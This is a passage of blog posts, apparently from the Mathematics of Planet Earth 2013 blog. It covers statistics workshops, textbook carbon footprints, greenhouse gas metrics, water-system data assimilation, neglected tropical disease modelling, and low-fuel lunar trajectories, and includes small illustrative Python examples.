    The workshop consisted of a variety of talks and presentations on the theory and applications of copulas and skew-elliptical distributions when used as multivariate models. One of the aims was to generate intellectual discussion of the use of these statistical models for analyzing data arising from several disciplines. Applications came from disciplines including, but not limited to, climate change, finance, insurance, and medicine.

    For example, a multivariate framework was constructed to understand the uncertainties resulting from expert opinions of future sea-level rise from ice sheets in East and West Antarctica and Greenland. Multivariate spatial models were also used to analyze the brain activities of individuals with certain neurological disorders such as Down Syndrome.

    This first-of-its-kind workshop is expected to open avenues for further advances in this exciting area of research.

    Details about the workshop can be found here.

    Marc G. Genton, Professor of Statistics
    CEMSE Division, Al Khwarizmi Building, Office 0111
    King Abdullah University of Science and Technology
    Thuwal 23955-6900
    Saudi Arabia
    marc.genton@kaust.edu.sa

    Posted in Statistics, Workshop Report | Leave a comment

    The Carbon Footprint of Textbooks

    Compared with a conventional textbook, it’s obvious that an e-text saves energy and reduces greenhouse gas emissions—or is it?

    When you actually look at the way students use both kinds of textbooks, the obvious turns out to be not so obvious. Looking at the behavior of college students is exactly what Thomas F. Gattiker, Scott E. Lowe, and Regis Terpend did in order to determine the relative energy efficiency of electronic and conventional hard copy textbooks.

    They used survey data from 200 students, combined with life cycle analysis of digital and conventional textbooks, and found that on average the carbon footprint of digital textbooks is somewhat smaller, but not by as much as you might hope.

    In a short summary article for The Chronicle of Higher Education, Gattiker and Lowe write:

    “We discovered that when we consider all greenhouse-gas emissions over the life cycle of the textbook, from raw-material production to disposal or reuse, the differences between the two types of textbooks are actually quite small. Measured in pounds of carbon-dioxide equivalent (CO2e), a common unit used to measure greenhouse-gas emissions, the use of a traditional textbook resulted in approximately 9.0 pounds of CO2e per student per course, versus 7.8 pounds of CO2e for an e-textbook.”

    However, there is a wide variability in the energy used by individual students, and the reasons are easy to understand. Some of the factors that matter are:

    • the device on which the e-text is read (desktop computer, laptop, dedicated e-reader)
    • the number of pages printed by the student and whether the pages were two-sided or single-sided
    • the source for the electric power (hydro, coal, natural gas)
    • the number of times a hard-copy book is resold

    Compare a 500-page conventional text with the same text in digital format. If the student reads it on a desktop computer located where electric power is generated by burning coal and if the student prints 200 one-sided pages, then the carbon footprint is much greater for the e-book. But if the student reads it on an e-reader, doesn’t print much, and gets hydro-electric power, then the e-book has a much smaller carbon footprint.
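
    The back-of-the-envelope comparison above is easy to reproduce. The sketch below uses made-up emission factors purely to show how the answer flips with the reading device, the power source, and the amount of printing; the study’s actual life-cycle numbers differ.

```python
# Toy comparison of e-text vs. hard-copy footprints.  All emission factors
# below are invented for illustration; they are not the study's values.

def etext_footprint(hours_read, device_kwh_per_hour, grid_kgco2e_per_kwh,
                    pages_printed, kgco2e_per_printed_page):
    electricity = hours_read * device_kwh_per_hour * grid_kgco2e_per_kwh
    printing = pages_printed * kgco2e_per_printed_page
    return electricity + printing

def hardcopy_footprint(production_kgco2e, times_resold):
    # Reuse spreads the production footprint over successive owners.
    return production_kgco2e / (times_resold + 1)

# Desktop + coal power + 200 single-sided pages vs. e-reader + hydro power:
print(etext_footprint(40, 0.20, 0.9, 200, 0.01))   # ~9.2 kg CO2e
print(etext_footprint(40, 0.01, 0.02, 0, 0.01))    # ~0.008 kg CO2e
print(hardcopy_footprint(4.1, 1))                  # ~2.05 kg CO2e (resold once)
```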

    They identify three “levers” that college faculty and students can use to reduce the carbon load associated with textbooks:

    • Encourage multiple use of hard-copy textbooks.
    • Read e-texts on laptops and dedicated readers rather than desktop computers.
    • Print on both sides with recycled paper.

    The full article describing the research of Gattiker, Lowe, and Terpend is “Online Texts and Conventional Texts: Estimating, Comparing, and Reducing the Greenhouse Gas Footprint of two Tools of the Trade,” Decision Sciences Journal of Innovative Education, Volume 10, Issue 4, pages 589-613, October 2012.

    Posted in Economics, Resource Management | Leave a comment

    SAMSI Undergraduate Workshop — Predicting the 2013 Hurricane Season Using Real Data

    During the week of May 13, 2013, thirty-four students from around the United States attended the Statistical and Mathematical Sciences Institute (SAMSI) Undergraduate Modeling Workshop. On the first day, students had an opportunity to learn about tropical storm formation and hurricane forecasting from Dr. Carl Schreck, a researcher at the Cooperative Institute for Climate and Satellites North Carolina. They also heard talks from a statistician, Dr. Richard Smith, the Director of SAMSI, and a mathematician, Dr. Chris Jones from the University of North Carolina, both involved with climate research. Later in the week, the students also attended a talk by Dr. Montserrat Fuentes, from the Department of Statistics at North Carolina State University, on statistical methods for studying pollution.

    For the bulk of the week, the students worked on modeling and analyzing hurricane prediction data acquired from the database used by researchers at NCSU to forecast characteristics of each year’s hurricane season. Students got an introduction to the database and also the opportunity to use climate data products to update entries in the database. After understanding how the data were acquired and ‘cleaned up’, various SAMSI post-docs and graduate fellows gave tutorials on Poisson regression and its implementation using R to predict the number of landfalls along the eastern US for the 2013 hurricane season. On the final morning, students gave their presentations, many of which are available on the SAMSI website.
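
    The students used R, but the same Poisson-regression exercise can be sketched in Python with statsmodels; the predictors and counts below are synthetic placeholders, not the NCSU database.

```python
import numpy as np
import statsmodels.api as sm

# Synthetic stand-in for the landfall database: yearly landfall counts and two
# climate predictors (say, an SST index and an ENSO index), invented here.
rng = np.random.default_rng(1)
n_years = 60
sst = rng.standard_normal(n_years)
enso = rng.standard_normal(n_years)
rate = np.exp(1.2 + 0.3 * sst - 0.2 * enso)      # "true" model used to fake data
landfalls = rng.poisson(rate)

# Fit a Poisson GLM of landfall counts on the two predictors.
X = sm.add_constant(np.column_stack([sst, enso]))
fit = sm.GLM(landfalls, X, family=sm.families.Poisson()).fit()
print(fit.summary())

# Predicted landfall count for a hypothetical upcoming season:
x_new = sm.add_constant(np.array([[0.5, -1.0]]), has_constant='add')
print(fit.predict(x_new))
```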

    Dr. Carl Schreck, from the Cooperative Institute for Climate and Satellites North Carolina, attended the presentations. The following are his comments about the workshop:

    “As an atmospheric scientist focused on the Tropics, participating in SAMSI’s recent Interdisciplinary Workshop for Undergraduates was a fascinating experience. Math and statistics students from all around the country were tasked with developing statistical models to predict the number of tropical storms and hurricanes that would make landfall in the United States this summer. My role was to give them an overview of how hurricanes form and how climate signals might be used to predict their seasonal activity. I was very impressed by the depth of the questions they asked me. Even though the material was outside of their comfort zones, they were clearly eager to embrace it.

    At the end of the workshop, each group of students presented their forecasts and methodologies. The climate signals they used as predictors are available as monthly averages going back to 1950. The students showed great innovation in how they average multiple months to stabilize predictors. Their solutions ranged from a simple average of the three most recent months to a 12-month weighted averaging scheme that put more emphasis on the most recent values.

    The students also showed great creativity in how they selected their predictor signals. Some chose predictors based on physical understanding of how they might affect hurricanes, while others let the data guide them to whatever predictors had the strongest statistical relationships. Their forecasts for 2013 ranged from 4 to 10 tropical storms making landfall this year, with the consensus or average around 6. I’m looking forward to seeing how well those forecasts verify!”

    Mr. Lee Richardson, a participant from the University of Washington at Seattle, shares his experience of the workshop:

    “I spent last week at North Carolina State University, at an undergraduate workshop that focused on modeling hurricanes that would hit America in 2013. I didn’t know what to expect going in, as this was the first workshop style event I have ever attended. The week turned out to be one of the most inspiring/interesting/helpful weeks of my life. Not only did we have very current data to address a significant real world problem, but the people I met were very interesting and helpful as well. It was refreshing to spend a week with people who were also passionate about statistics, and being able to ask post-docs and others for help whenever we got stuck looking at the data was invaluable.

    Another thing that was great about the workshop was how many prestigious, and successful people from the statistical/mathematical world were there to give us advice and talks on their research. Getting perspectives on the state of statistics, climate statistics, and graduate school from people who are very experienced in these fields was enlightening. While I already had spent a good amount of time reading about graduate school, I can safely say that after attending this workshop I am wholly more prepared to pursue statistics graduate school and very excited about being a part of the future of Statistics.”

    Dr. David J. Lawlor, a current post-doc at SAMSI, wrote:

    “This year’s undergraduate modeling workshop was a lot of fun for me. I always enjoy interacting with the undergrads who pass through SAMSI, who bring a level of enthusiasm and energy that I remember having when I was that age. It’s nice to be able to pass on advice to the next generation of math/stats students. I think the theme of this year’s program, hurricane prediction, was a great test case for the students to work on. The data are easy to understand and collect, and there were enough degrees of freedom in making modeling decisions that every group was able to do something different and defend their choices at the end of the workshop. I hope that this exposure to the research process will pique the interest of at least one student who might not otherwise have been considering graduate school in the mathematical and statistical sciences.”

    Ms. Kristin Linn, a SAMSI graduate fellow and a Ph.D. candidate at NCSU wrote:

    “I was impressed with the caliber of the undergraduates who attended the modeling workshop. I loved hearing students throughout the week say, `I’ve never considered graduate school, but now I must go. There’s so much more about statistics that I want to learn.’ My favorite part of the workshop was watching each group present their final results. It was obvious that the students found the hurricane data interesting and fun to work with, and the presentations were all engaging and informative. The students learned how to apply Poisson regression to predict hurricane counts given environmental predictors from previous years. Most groups used stepwise selection with an AIC or BIC criterion to build a model, and some groups wrote their own R code to assess their models using cross-validation. The workshop offered a unique experience that will inspire and benefit the students for years to come!”

    The workshop was part of the Mathematics of Planet Earth 2013 (MPE2013) program at SAMSI.

    Snehalata Huzurbazar, Deputy Director of SAMSI
    Jamie Nunnelly, SAMSI’s Communications Director

    Posted in Natural Disasters, Statistics, Weather, Workshop Report | Leave a comment

    Measuring Carbon Footprints

    Releasing a ton of carbon dioxide into the atmosphere has quite a different effect on the global average temperature than releasing a ton of methane. Have you ever wondered how the effects of different greenhouse gases are compared? Designing appropriate metrics is nontrivial but essential for setting standards and defining abatement strategies to limit anthropogenic climate change, as was done for example in the Kyoto Protocol. Yes, we are talking about a “carbon footprint.” Do you know how it is defined?

    The standard unit for measuring carbon footprints is the carbon dioxide equivalent (CO2e): emissions are expressed as a mass of CO2e (for example, metric tons), while atmospheric concentrations of CO2e are expressed in parts per million by volume (ppmv). The idea is to express the impact of each different greenhouse gas in terms of the amount of CO2 that would create the same amount of warming. That way, a carbon footprint consisting of lots of different greenhouse gases can be expressed as a single number.

    Standard ratios are used to convert the various gases into equivalent amounts of CO2. These ratios are based on the so-called Global Warming Potential (GWP) of each gas, which describes its total warming impact relative to CO2 over a set period of time (the “time horizon,” usually 100 years). Over this time frame, according to the standard data, methane scores 25 (meaning that one metric ton of methane will cause the same amount of warming as 25 metric tons of CO2), nitrous oxide comes in at 298 and some of the super-potent greenhouse gases score more than 10,000.

    The adequacy of the GWP has been widely debated since its introduction. The choice of a time horizon is a critical element in the definition. A gas which is quickly removed from the atmosphere may initially have a large effect, but over longer time periods it becomes less important, since it has already been removed. Thus methane has a potential of 25 over 100 years but 72 over 20 years; conversely, sulfur hexafluoride has a GWP of 23,900 over 100 years but 16,300 over 20 years. Relatively speaking, therefore, the impact of methane – and the strategic importance of tackling its sources, such as agriculture and landfill sites – depends on whether you’re more interested in the next few decades or the next few centuries. The 100-year time horizon set by the Kyoto Protocol puts more emphasis on near-term climate fluctuations caused by emissions of short-lived species (like methane) than by emissions of long-lived greenhouse gases. Since the GWP value depends on how the gas concentration decays over time in the atmosphere, and this is often not precisely known, the values should not be considered exact. Nevertheless, the concept of the GWP is generally accepted by policy makers as a simple tool to rank emissions of different greenhouse gases.
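
    In practice, converting an emissions inventory to CO2e is just a weighted sum, with the GWP values as weights. Here is a minimal sketch using the 100-year values quoted above; the helper function and the inventory itself are invented for illustration.

```python
# Convert a small emissions inventory (metric tons of each gas) into
# CO2-equivalent using the 100-year Global Warming Potentials quoted above.
GWP_100 = {"CO2": 1, "CH4": 25, "N2O": 298, "SF6": 23_900}

def co2_equivalent(emissions_tons):
    return sum(tons * GWP_100[gas] for gas, tons in emissions_tons.items())

inventory = {"CO2": 1_000.0, "CH4": 10.0, "N2O": 1.0}   # illustrative numbers
print(co2_equivalent(inventory))   # 1000 + 250 + 298 = 1548 tons CO2e
```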

    Posted in Atmosphere, Climate Change | Leave a comment

    Using Mathematics to Understand, Detect, and Predict Biological Events in Our Water Systems

    In coastal ocean, estuary, and lake systems, there is much interest in understanding, detecting, and predicting biological events such as harmful algal blooms. This requires a combination of numerical modeling and observation from both the ground and the air.

    Mathematical modeling of the biology and chemistry, both simplified and complex, is a rich and active area of research, but the predictive accuracy of these models is often degraded by the accuracy of hydrodynamic inputs such as temperature, salinity, and currents. These fields can come from both numerical models and from observations. Models that numerically solve the (incompressible, typically hydrostatic) Navier-Stokes equations have the advantage of providing all variables at any specified time and location. The downside in the ocean is the same as it is in the atmosphere: all models have errors and those errors can lead to significant errors in the model results. Observations, either in situ or remote, sample the real system, but typically only at infrequent times and over a fraction of the domain of interest. Satellite images, for example, can only observe certain surface variables, are limited by cloud cover, and are inaccurate near the coast.

    Some of these issues can be addressed through a process that has been mentioned a few times in this blog: data assimilation. At a simple level, data assimilation can be thought of as an interpolation of both observational data and model predictions, where each piece is weighted by its uncertainty. Where no observations exist the model can give reasonable estimates, while observations can be used to move the model fields closer to the true state. This process is used to improve initial conditions at all of the major operational weather centers in the world for the purpose of forecasting. In the ocean, error in the boundary conditions is often a larger source of error than chaos, but data assimilation can still improve results through improving the initial conditions. This is something that I have worked on in the Chesapeake Bay [1] to produce more accurate flow fields that can be used for driving biological and chemical models.
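
    The “weighted by uncertainty” idea can be made concrete for a single scalar variable: the standard optimal-interpolation (Kalman) update below combines a forecast and an observation with weights inversely proportional to their error variances. The numbers are invented.

```python
# Data assimilation in one line: combine a model forecast and an observation,
# each weighted by the inverse of its error variance (the Kalman / optimal
# interpolation update for a single scalar variable).

def assimilate(forecast, obs, var_forecast, var_obs):
    gain = var_forecast / (var_forecast + var_obs)   # weight given to the obs
    analysis = forecast + gain * (obs - forecast)
    var_analysis = (1 - gain) * var_forecast
    return analysis, var_analysis

# Model says 22.0 C with variance 1.0; a satellite retrieval says 20.5 C with
# variance 0.25 (numbers invented).  The analysis is pulled toward the obs.
print(assimilate(22.0, 20.5, 1.0, 0.25))   # (20.8, 0.2)
```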

    Data assimilation can incorporate satellite observations, but the satellite observations themselves warrant some consideration. Satellite temperature observations are available, but satellites do not actually observe temperature directly. Instead, radiation given off by the ocean and passed through the atmosphere is recorded (the observation is known as a radiance). These values are turned into temperatures through what is mathematically an inverse problem. This inverse modeling requires some knowledge of the physical relationship between the desired quantity (in this case temperature) and the emitted radiation. This relationship is less clear when the desired quantity is something like an abundance of algae.

    As an alternative to the inverse modeling, statistical models can be developed by using satellite radiances as predictors for some quantity observed in situ. One example is using this to estimate salinity values in Chesapeake Bay [2], but this type of statistical modeling can also be used to predict other quantities, such as biology. This is done experimentally in the Chesapeake Bay for sea nettles.
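
    A minimal sketch of this statistical alternative — regressing an in-situ quantity on satellite radiances used as predictors — is given below with synthetic data and ordinary least squares; the model actually used in [2] is more sophisticated.

```python
import numpy as np

# Statistical alternative to inverse modeling: fit in-situ salinity as a
# linear function of satellite radiances in a few channels (synthetic data).
rng = np.random.default_rng(2)
n_obs, n_channels = 500, 3
radiances = rng.normal(size=(n_obs, n_channels))
salinity = 15 + radiances @ np.array([2.0, -1.0, 0.5]) + rng.normal(0, 0.3, n_obs)

X = np.column_stack([np.ones(n_obs), radiances])
coef, *_ = np.linalg.lstsq(X, salinity, rcond=None)
print(coef)                                      # intercept and channel weights

# Predict salinity wherever the satellite sees the surface:
new_radiance = np.array([1.0, 0.2, -0.5, 0.3])   # [1, channel values]
print(new_radiance @ coef)
```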

    What’s Next? Mathematicians are working on enhancing the utility of these types of models, with the long-term goal of guiding environmental and public health officials as they make policy decisions.

    [1] Hoffman, M.J., T. Miyoshi, T. Haine, K. Ide, R. Murtugudde, and C.W. Brown. 2012. Advanced data assimilation system for the Chesapeake Bay. J. Atmos. and Oceanic Tech., 29, 1542-1557, 10.1175/JTECH-D-11-00126.1.

    [2] Urquhart, E, M.J. Hoffman, B.F. Zaitchik, S. Guikema, and E.F. Geiger. 2012. Remotely Sensed Estimates of Surface Salinity in the Chesapeake Bay. Remote Sensing of the Environment., 123, 522-531, doi: 10.1016/j.rse.2012.04.008.

    Matthew J. Hoffman and Kara L. Maki
    School of Mathematical Sciences
    Rochester Institute of Technology

    Posted in Biology, Data Assimilation, Mathematics | Leave a comment

    Neglected Tropical Diseases — and how mathematics can help

    You might have heard of a group of diseases called the “Neglected Tropical Diseases”. This isn’t just a generic title for all the forgotten diseases in the world; it’s a specific designation by the World Health Organization for 13 particular diseases that qualify for neglected status. Collectively, these diseases infect about one sixth of the world’s population.

    The diseases in question include three types of worm (hookworm, roundworm and whipworm), a number of helminths (elephantiasis, river blindness, Guinea worm disease and schistosomiasis), protozoans (leishmaniasis, Chagas’ Disease, sleeping sickness) and bacterial infections (the Buruli ulcer, leprosy and trachoma). Approximately 4.2 billion people — more than half the population of the Earth — are at risk for hookworm alone, with 807 million currently infected.

    What characterizes these particular diseases isn’t that — unlike more sensational diseases like HIV/AIDS, malaria and TB — they kill huge numbers of people (about 530,000 people per year, although that’s still not nothing). Instead, they’re responsible for massive levels of disfigurement and disability, impairing childhood development and economic productivity. They’re found in every tropical country (including Australia) and yet are neglected at the community, national and international levels, largely because they affect the poor, the powerless and the stigmatised.

    For example, Chagas’ disease kills 50,000 people a year (far more than West Nile virus, Bird Flu and swine flu combined), but you probably haven’t heard of it because it’s a disease of the poor. If your house is made of sticks, the bugs that carry the disease burrow through your walls and bite you under the eye. But if you can afford plaster, then you’re completely safe. So it’s a widespread disease in poor, rural South America (where the average life of a dog is about two years, thanks to the disease), but doesn’t kill anyone who might be in a position to lobby governments, advocate for medical interventions or mobilize advertising campaigns.

    Rather than simply count deaths, the World Health Organization has developed a measure of the number of years of life lost to premature death or disability, the DALY (Disability-Adjusted Life Year). The number of DALYs per year for HIV/AIDS is 84.5 million. That is, without HIV/AIDS we’d have about 84,500,000 years of healthy life back. But NTDs are collectively the next largest burden on the world, with 56.6 million DALYs (diarrhoeal diseases are third, followed by childhood and vaccine-preventable diseases, then malaria and TB). So despite being neglected, the NTDs are one of the largest problems human beings face today.

    Treatments exist for some NTDs, although often control occurs through less “sexy” methods, such as mass dewormings in schools, insecticides, safe water and, in some cases, arsenic and amputation. (Seriously. Arsenic is still used to treat sleeping sickness, while the only treatment for the Buruli ulcer is to amputate infected limbs. NTDs ain’t pretty.) Part of the problem is that there’s no money in them: why would a profit-driven pharmaceutical company waste time developing treatments for diseases whose sufferers can’t pay? Of the 1600 drugs developed between 1974 and 2004, only 18 were for tropical diseases (and 3 for TB).

    So what’s to be done? Fortunately, there are a couple of success stories. Guinea worm disease has been all but eliminated, despite having no vaccine, no drug and no immunity. Instead, behavior changes (convincing people not to put infected limbs in the water, distributing cloth filters to villages and outfitting nomadic people with drinking pipes) have led to a massive reduction in cases and already eliminated the disease from Asia and the Middle East.

    Who made this miraculous feat happen? It’s thanks to the efforts of one man: former president Jimmy Carter, who did the unglamorous but important work of mobilizing public-private partnerships, delivering education messages to remote populations and even negotiating a “Guinea worm ceasefire” in the Sudan civil war so that NGOs could go in and educate those most at risk. As a result, Guinea worm disease has been almost eradicated from the planet. It’s not only going to be the first parasitic disease to be eradicated, it’s also going to be the first to be eliminated using behavior changes alone. That’s an incredible achievement.

    Another success story is river blindness, and this is where mathematical modelling comes into the picture. The West African river blindness program was developed as a co-production between the World Health Organization, the World Bank, the UN, and 20 donor countries and agencies in 1974. Mathematical modelling was used at the outset to predict long-term outcomes; by including modelling in the design of the program, sceptical donors were convinced that control was feasible. When the drug ivermectin was made available in the late eighties, mathematical models were able to adapt to its inclusion. After the program was completed, modelling retained a prominent role in subsequent policy discussions.

    One of the great advantages of mathematical modelling is that it’s cheap. A lot can be done with a little, so many potential scenarios can be investigated even when data is limited. In a way, this makes NTDs an ideal subject for modelling to tackle. There are a great many problems that urgently need to be solved that mathematical models could help with.

    Unfortunately, the NTDs are as neglected by modelling as they are by everyone else. Only sleeping sickness has received any substantial theoretical modelling. There are no models at all for the Buruli ulcer and only one for Guinea worm disease. When models do exist for NTDs, they’re usually confined to one lab and its collaborators per NTD. What we urgently need is a diversity of voices.

    Specific problems might include adapting malaria pesticide models for vector control in Chagas’ disease or leishmaniasis. Spatial modelling is also needed: access to resources depends heavily on geography, so models that account for distance to hospitals, swamps, mountains and road networks are crucial. Co-infection models — between other NTDs and also major diseases like HIV — are also desperately needed.
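    To give an idea of how small a starting point can be, here is a minimal Ross-Macdonald-style vector-host sketch in Python. It is not calibrated to Chagas’ disease, leishmaniasis or any other NTD; every parameter is a placeholder, and a useful model would add the spatial structure, co-infection and access-to-care effects described above.

    import numpy as np
    from scipy.integrate import solve_ivp

    # Minimal vector-host model: x = infected fraction of hosts,
    # z = infected fraction of vectors. Placeholder parameters only.
    a, b, c = 0.3, 0.5, 0.5   # biting rate, infection probabilities per bite
    mu_v, gamma = 0.1, 0.01   # vector mortality, host recovery (per day)
    m = 2.0                   # vectors per host
    # Basic reproduction number for this model: R0 = m*a**2*b*c/(gamma*mu_v)

    def rhs(t, y):
        x, z = y
        dx = m * a * b * z * (1 - x) - gamma * x
        dz = a * c * x * (1 - z) - mu_v * z
        return [dx, dz]

    sol = solve_ivp(rhs, [0, 365], [0.01, 0.0])
    print("Host prevalence after one year:", round(sol.y[0, -1], 3))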

    Modelling could also help quantify the costs that disabling NTDs impose on developing economies: if treating NTDs is shown to cost less than the productivity they destroy, this will help motivate action. Another, slightly meta, approach might be to model research funding itself: if granting agencies are requiring researchers to provide “at home” benefits, this could be standing in the way of significant work on diseases that might help a very large number of people.

    In summary, NTDs require immediate attention. They exact an enormous price in suffering, lack of economic development and the promotion of poverty. Mathematical models can be used to inform policy at minimal cost, solving problems that may not be theoretically complex, but which have the potential to deliver enormous benefits.

    NTDs are the low-hanging fruit of mathematical modelling. A great many problems could be solved, relatively easily, by harnessing the power of mathematical modelling. The price — political and otherwise — for such a huge improvement in the quality of life for one sixth of the world’s population is tiny.

    Robert Smith?
    The Department of Mathematics
    The University of Ottawa
    585 King Edward Ave
    Ottawa, ON K1S 0S1
    Canada

    Posted in Disease Modeling, Mathematics, Public Health | 1 Comment

    Report: The Mathematical Sciences in 2025

    The full report on The Mathematical Sciences in 2025 from the National Academies Press is now available for download.

    The report analyzes the current state of various fields under the umbrella of the mathematical sciences, presenting ideas to ensure that the discipline remains in a strong position, and is capable of maximizing its contributions to the nation in 2025. The report recommends the reassessment of training for future generations of mathematical scientists in light of the growing cross-disciplinary nature of the field. Download the full report at the link above.

    Posted in General, Mathematics, Statistics | Leave a comment

    AIM Workshop: Nonhomogeneous boundary-value problems for nonlinear waves

    This week at AIM features an MPE-related workshop concerned with boundary-value problems for nonlinear dispersive evolution equations and systems. The workshop is organized by Jerry Bona, Min Chen, Shuming Sun, and Bingyu Zhang and has participants with diverse interests in both the pure and applied aspects of such problems.

    Nonlinear, dispersive evolution equations and systems of such equations arise as models for wave motion in a very wide variety of physical, biological and engineering settings. Since the 1960s, there has been a steady increase of interest in the theory and applications of such equations. On the mathematical side, the pioneering work of Ginibre and Velo and of Kenig, Ponce and Vega was followed by the spectacular progress of Bourgain, Tao and their collaborators, as well as many others.

    If one tries to use the pure initial-value formulations in practice, one is immediately beset by the difficulty of accurately determining a wave profile in the entire spatial domain of its definition at a single instant of time. Generally speaking, this is not possible to accomplish with any semblance of accuracy. Moreover, when these equations are used in engineering and science, the natural way to pose them is with specified, not necessarily homogeneous, boundary conditions. And problems of control of dispersive equations demand a firm grasp of boundary-value problems as a starting point for developing cogent theory.
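    As one representative illustration (a much-studied model problem, written here only schematically), the quarter-plane initial-boundary-value problem for a KdV-type equation reads

    \[
    \begin{aligned}
    u_t + u_x + u u_x + u_{xxx} &= 0, && x > 0,\ t > 0,\\
    u(x,0) &= \phi(x), && x \ge 0,\\
    u(0,t) &= g(t), && t \ge 0,
    \end{aligned}
    \]

    where the boundary datum g(t) can come from measurements of the wave amplitude at a single location, such as a wave-maker in a flume or an offshore gauge, which is far easier to obtain than an accurate profile of the wave over the whole spatial domain at one instant.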

    By contrast with the initial-value problem, theory for boundary-value problems other than those featuring periodicity has generally lagged behind the developments for the pure initial-value problems. The overall goal of the workshop is to advance the study of boundary-value problems for nonlinear dispersive wave equations. Some specific topics that are being considered are:

    1. Investigating the smoothing properties enjoyed by solutions of boundary-value problems and associated well-posedness theory.

    2. Investigating the controllability and stabilizability of solutions of nonlinear, dispersive wave equations. Experience shows that results from the first topic above will be central to such an investigation.

    3. Extending the theory to multi-space dimensional problems arising in geophysical applications such as coastal dynamics and elsewhere.

    Estelle Basor
    AIM

    Posted in Mathematics, Workshop Report | Leave a comment

    2013 SIAM Conference on Applications of Dynamical Systems

    The 2013 SIAM Conference on Applications of Dynamical Systems (DS13) will be held at the Snowbird Ski and Summer Resort, Snowbird, Utah, May 19-23. Co-chairs of the Organizing Committee are Charlie Doering (U Michigan, Ann Arbor) and George Haller (ETH Zurich, Switzerland). As of May 14, the meeting has 707 pre-registered participants; attendance is expected to exceed 800. The program features 9 invited presentations, 136 minisymposium sessions, 191 contributed papers, and 88 contributed posters. Nancy Kopell (Boston U) will deliver the Jurgen Moser Lecture, and the SIAM Activity Group on Dynamical Systems (SIAG/DS) will present the J.D. Crawford prize to Panayotis Kevrekidis (U Massachusetts, Amherst).

    This year’s Snowbird meeting will host a Featured Minisymposium on “Dynamics of Planet Earth” as part of MPE2013. The Featured Minisymposium (MS38) is organized by Hans Kaper, chair of the SIAG/DS, and will take place on Monday, May 20, 2:30 p.m. – 4:45 p.m., in Ballroom I.

    The minisymposium will feature an overview talk by the organizer and four talks on specific applications of dynamical systems and bifurcation theory to the Earth’s climate system. Chris Danforth (U Vermont) will demonstrate a novel method for improving forecasts during integration of a weather model. Mary Silber (Northwestern U) will discuss tipping points in the context of bifurcation theory, using case studies of possible tipping points in models of Arctic sea-ice retreat and desertification. Marty Anderies (Arizona State U), who is interested in land use and the carbon cycle, will explore the relationship between nonlinear dynamics and planetary boundaries. Mary Lou Zeeman (Bowdoin College and Cornell U) will focus on issues of sustainability and will explore how a decision-support viewpoint may inspire new questions for dynamical systems.

    The biennial Snowbird meetings offer a unique opportunity to learn about the application of dynamical systems theory to areas outside of mathematics. These application areas are diverse and multidisciplinary, ranging over all areas of applied science and engineering, including biology, chemistry, climate, geophysics, physics, finance, and industrial applied mathematics. This conference strives to achieve a blend of application-oriented material and the mathematics that informs and supports it. The goals of the meeting are a cross-fertilization of ideas from different application areas, and increased communication between the mathematicians who develop dynamical systems techniques and applied scientists who use them.

    Posted in Climate, Conference Announcement, Energy, Mathematics, Sustainability, Weather | Leave a comment

    Low Fuel Spacecraft Trajectories to the Moon

    A recent blog entry discussed why celestial mechanics is part of the focus of MPE2013. Here I suggest a further argument in favor of this inclusion and call attention to some recent events and mathematical ideas in connection with explorations beyond planet Earth.

    There is widespread interest in finding and designing spacecraft trajectories to the Moon, Mars, other planets, or other celestial bodies (comets, asteroids) that require as little fuel as possible. This is justified mostly by the cost of the missions: each extra pound of load for a spacecraft costs roughly 1 million dollars. Hence, for robotic space missions, which typically conduct numerous observations and measurements over long periods of time, in order to maximize the equipment load, it is imperative to minimize the fuel consumption of the propulsion system. One way to achieve this is to cleverly exploit, in a mathematically explicit way, the gravitational forces of the Earth, Moon, Sun, etc.

    To illustrate the concept, suppose that one would like to design a low-energy transfer from the Earth to the Moon. Of course, first one has to place the spacecraft on some orbit around the Earth, which is unavoidably energy expensive. Surprisingly though, the second leg of the trajectory, to take the spacecraft from near the Earth to some prescribed orbit about the Moon, can be done at a low energy cost (in theory, even for free). Say that we would like to insert the spacecraft at the periapsis of an elliptic orbit about the Moon, of prescribed eccentricity and at some prescribed angle with respect to the Earth-Moon axis. We would like to do that without having to slow down the spacecraft at the arrival (or maybe just a little), thus saving the fuel necessary for such an operation. Imagine that we run the “movie” of the trajectory backwards, from the moment when the spacecraft is on the elliptic orbit. Since the eccentricity is fixed, the semi-major axis determines the velocity of the spacecraft at the periapsis. If the semi-major axis is too short (or, equivalently, the velocity is too low), the trajectory will turn around the Moon without leaving the Moon region; such a trajectory is deemed ‘stable’. By gradually increasing the semi-major axis (hence, the velocity), one will find a trajectory that leaves the Moon region and makes a transfer to the Earth region; such a trajectory is deemed ‘unstable’. See Fig. 1.

    Fig. 1. Stable and unstable trajectories; P1 denotes the Earth and P2 the Moon.
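    The procedure sketched above can be caricatured in a few dozen lines of code. The fragment below integrates the planar circular restricted three-body problem in the rotating Earth-Moon frame and bisects on the semi-major axis to bracket the transition between "stable" and "unstable" behaviour. It is a cartoon for illustration only: the escape test, the way the osculating ellipse is set up in the rotating frame, the integration time and the bracketing interval are all deliberately crude choices, not mission-design values.

    import numpy as np
    from scipy.integrate import solve_ivp

    MU = 0.01215  # Moon/(Earth+Moon) mass ratio, approximate

    def eom(t, s):
        # Planar circular restricted three-body problem, rotating frame.
        x, y, vx, vy = s
        r1 = np.hypot(x + MU, y)        # distance to the Earth
        r2 = np.hypot(x - 1 + MU, y)    # distance to the Moon
        ax = x + 2*vy - (1 - MU)*(x + MU)/r1**3 - MU*(x - 1 + MU)/r2**3
        ay = y - 2*vx - (1 - MU)*y/r1**3 - MU*y/r2**3
        return [vx, vy, ax, ay]

    def escapes(a_semi, ecc=0.0, theta=0.0, t_max=15.0, r_escape=0.5):
        """Start at the periapsis of an osculating ellipse about the Moon
        and report whether the trajectory leaves the Moon region."""
        rp = a_semi * (1 - ecc)                        # periapsis distance
        v = np.sqrt(MU * (1 + ecc) / rp)               # two-body periapsis speed
        x0 = 1 - MU + rp*np.cos(theta)
        y0 = rp*np.sin(theta)
        vx0, vy0 = -v*np.sin(theta), v*np.cos(theta)   # tangential velocity
        leave = lambda t, s: np.hypot(s[0] - 1 + MU, s[1]) - r_escape
        leave.terminal, leave.direction = True, 1
        sol = solve_ivp(eom, [0, t_max], [x0, y0, vx0, vy0],
                        events=leave, rtol=1e-8, atol=1e-10)
        return sol.t_events[0].size > 0

    # Bisect on the semi-major axis between a "stable" and an "unstable" guess.
    lo, hi = 0.01, 0.15
    for _ in range(20):
        mid = 0.5 * (lo + hi)
        lo, hi = (mid, hi) if not escapes(mid) else (lo, mid)
    print("Approximate weak-stability-boundary semi-major axis:", 0.5*(lo + hi))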

